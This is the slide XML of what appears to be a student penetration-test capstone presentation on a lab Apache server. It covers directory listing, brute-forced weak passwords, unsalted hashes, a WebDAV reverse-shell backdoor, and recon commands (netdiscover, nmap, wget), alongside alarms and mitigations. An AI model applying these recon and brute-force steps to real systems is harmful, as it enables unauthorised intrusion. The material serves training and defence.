                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Restrict access to authentication URLs</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Limit login attempts</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Two-factor authentication</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Use CAPTCHAs which are programs to distinguish between human and non-human interaction.</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Describe the solution. If possible, provide the required command line(s). </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>Strong passwords are unique, long, and harder to guess.</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>A requirement for brute force attacks is to send credentials so changing the login page URL can usually be enough to stop most automated tools.</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>Attackers will only be able to try a few passwords.</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>Two-factor authentication requires an additional code.</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>CAPTCHAs prevents access by bots and auto tools.</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232" name="Google Shape;123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33" name="Google Shape;1233;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kind of alarm can be set to detect future access to this directory?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Alarm for any HTTP request to WebDAV folder by outside IP address</a:t>
            </a:r>
            <a:endParaRPr/>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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Any single instance would trigger an alarm</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1234" name="Google Shape;1234;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configuration can be set on the host to control access?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Whitelist trusted IPs for WebDAV access</a:t>
            </a:r>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Describe the solution. If possible, provide the required command line(s). </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>$ iptables -A INPUT -s 192.168.1.105 -j ACCEPT</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240" name="Google Shape;1240;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41" name="Google Shape;1241;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kind of alarm can be set to detect future file uploads?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>An alarm can be set for any executable uploads to sensitive folders within the server.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The threshold would be for each singular instance of an executable uploaded file. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1242" name="Google Shape;1242;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4518250" y="16148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What configuration can be set on the host to block file uploads?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Have the file type validated when posted to the server and block executable files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Run files through an antivirus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Describe the solution. If possible, provide the required command line. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>By having the file validated, it can prevent extension spoofing that is used to hide the file type. In conjunction with the sensitive folders on the server blocking executables, this would help prevent further reverse shells from working.</a:t>
            </a:r>
            <a:endParaRPr/>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2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="115375" y="910475"/>
            <a:ext cx="6699600" cy="3897600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14509"/>
            </a:srgbClr>
          </a:solid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8" name="Google Shape;1058;p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
              <a:t>Address Range: 192.1.0/24</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Netmask: 255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Gateway: 192.168.1.1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a:t>IPv4: 192.168.1.105</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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OS: Windows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hostname: ML-RefVM-684427</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192.168.1.90</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Kali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 192.168.1.100</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ELK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9" name="Google Shape;1059;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pic>
        <p:nvPicPr>
          <p:cNvPr id="1060" name="Google Shape;1060;p4"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078227" y="826125"/>
            <a:ext cx="4518297" cy="395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6" name="Google Shape;1066;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7" name="Google Shape;1067;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3" name="Google Shape;1073;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4" name="Google Shape;1074;p6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198750"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{ED91D39B-12C1-4ABE-989E-9FD5C636A456}</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ML-RefVM-684427</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Switch</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Capstone</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Web server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Kali</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Pen. test system</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ELK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SIEM system</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sp>
        <p:nvSpPr>
          <p:cNvPr id="1080" name="Google Shape;1080;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1" name="Google Shape;1081;p7"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1201900"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{ED91D39B-12C1-4ABE-989E-9FD5C636A456}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
              </a:tblGrid>
              <a:tr h="397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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Apache Directory Listing</a:t>
                      </a:r>
                      <a:endParaRPr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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>CVE-2007-0450</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" u="none" cap="none" strike="noStrike">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Allows browser traversal to real directories on Capstone Apache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Allowed attackers to reveal the ip address and the secret folder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No Failed Login Lockout</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No account lockdown when excessive login failures occurred within a short period of time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Brute force attack was possible to gain access to Ryan’s login information</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Weak Password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The password was available on a common password library such as “rockyou”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The brute force attack was able to identify the login password.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Reverse Shell Backdoor</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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CVE-2019-13386</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Allows to send a reverse shell payload on a web server while the firewalls do not detect the payload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Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attackers gained the remote backdoor access to the Capstone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d8db5ee2cf_0_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 (Cont.)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1087" name="Google Shape;1087;gd8db5ee2cf_0_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8" name="Google Shape;1088;gd8db5ee2cf_0_7"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1201900"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{ED91D39B-12C1-4ABE-989E-9FD5C636A456}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
              </a:tblGrid>
              <a:tr h="418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Weak Hashed Password</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" u="none" cap="none" strike="noStrike">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Unsalted hashed information which can be decrypted using various web applications to decode</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 hashed information, the CEO login information, was decoded.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Simplistic Username</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Usage of the common names or real names as a login ID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By having an access to the directory, the attack was able to identify the login IDs</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Root Accessibility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The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>anonymous</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> commands has an access to the resources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None/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>The attacker was able to connect to devices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Unencrypted Credentials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 stored values of usernames and passwords, both passwords and the hashed passwords, were in a plain text</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 attacker was able to gain access to the login IDs and passwords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Apache Directory Listing CVE-2007-0450</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sp>
        <p:nvSpPr>
          <p:cNvPr id="1094" name="Google Shape;1094;p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#netdiscover -r 192.168.1.255/16</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#nmap -sV 192.168.1.1-105</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#nmap -sS -A 192.168.1.105</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#wget 192.168.1.105 /meet_our_team/ashton.txt</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1096" name="Google Shape;1096;p8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1097" name="Google Shape;1097;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8" name="Google Shape;1098;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8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1100" name="Google Shape;1100;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01" name="Google Shape;1101;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2" name="Google Shape;1102;p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Discovered all directories and file locations.</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discovered files on meet_our_team/ashton.txt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The ashton.txt allowed the discovery of the secret folder at /company_folders/secret_folder</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1104" name="Google Shape;1104;p8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1105" name="Google Shape;1105;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6" name="Google Shape;1106;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09" name="Google Shape;1109;p8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6092875" y="1480575"/>
            <a:ext cx="3045125" cy="1561125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1110" name="Google Shape;1110;p8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6092875" y="3100374"/>
            <a:ext cx="3063425" cy="11824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